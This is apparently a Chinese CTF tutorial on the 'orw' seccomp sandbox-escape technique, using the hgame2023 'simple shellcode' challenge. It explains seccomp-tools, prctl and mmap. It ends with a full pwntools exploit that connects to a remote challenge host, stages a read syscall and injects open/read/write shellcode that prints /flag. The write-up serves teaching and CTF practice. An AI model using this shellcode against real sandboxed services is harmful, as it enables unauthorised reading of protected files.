orw(沙箱逃逸)
现在有很多程序在运行时禁用了系统函数,均采用了沙箱技术开启了沙箱保护,我们不能正常的get shell,只能用ROP链来调用其他的函数,例如read,write来把flag打印出来。这就是orw沙箱逃逸技术的由来。
查看沙箱
在实战中我们可以通过 seccomp-tools来查看程序是否启用了沙箱, seccomp-tools工具安装方法如下:
- $ sudo apt install gcc ruby-dev
- $ gem install seccomp-tools
安装完成后通过 seccomp-tools dump ./pwn即可查看程序沙箱。
沙箱函数
最原始的沙箱规则是用prctl()函数规定的,这个函数规定了程序哪些函数在程序里不能被调用,所以以后遇见了这种函数,那大概率是开了沙箱。
int **prctl** ( int **option**,unsigned long arg2,unsigned long arg3,unsigned long arg4,unsigned long arg5 )
mmap()
一般来说,orw这种类型的题都会有一个mmap函数来改写一个地址的读写权限,我们需要利用这块地址来构造ROP链。
void *mmap (void *addr, size_t length, int prot, int flags, int fd, off_t offset);
例题:hgame2023 simple shellcode
题目链接:
下载附件,打开题目,可以看见mmap和read函数
mmap函数给了0xcafe0000这个地址一个可读写可执行权限,read函数能够读取0x10的数据到该地址上,最后将该处内存作为函数调⽤。那这里就可以写入shellcode。
继续跟进sandbox函数
可以看见有两个prctl函数,可以判断程序利用了沙盒保护,用seccomp-tools进行检查
可以看出禁用了execve和execveat,这样子get shell就很难了,只能使用orw。
利用思路:
1.因为0x10这个空间很小,我们没办法在上面构建shellcode,那就只能再重新调用一个read函数。
2.调用完了read函数后,利用orw来打开flag文件,并进行读取。
exp如下:
from pwn import * #p = process('./vuln') p=remote('1.14.71.254',28371) elf = ELF('./vuln') context.log_level = 'debug' context.terminal = ["konsole", "-e"] context.arch = "amd64" r = lambda x: p.recv(x) ra = lambda: p.recvall() rl = lambda: p.recvline(keepends=True) ru = lambda x: p.recvuntil(x, drop=True) sl = lambda x: p.sendline(x) sa = lambda x, y: p.sendafter(x, y) sla = lambda x, y: p.sendlineafter(x, y) ia = lambda: p.interactive() c = lambda: p.close() li = lambda x: log.info(x) db = lambda: gdb.attach(p) s = lambda x: p.send(x) shellcode = asm(""" xor eax,eax xor edi,edi mov edx,0x1000 mov esi,0xcafe0000 syscall """) #这里是调用read函数 sa("Please input your shellcode:",shellcode) shellcode = b"\x90" * 0x100 #这里的'\x90'是nop,数据改掉后滑到shellcode的地方开始执行 shellcode += asm(shellcraft.open("/flag")) shellcode += asm(shellcraft.read(3,0xcafe0100,0x100)) shellcode += asm(shellcraft.write(1,0xcafe0100,0x100)) s(shellcode) ia()
orw还有一些其他限制,例如or缺w,rw缺o的情况,这里只是一个入门报告,就不详细介绍了,具体可以看这篇文章
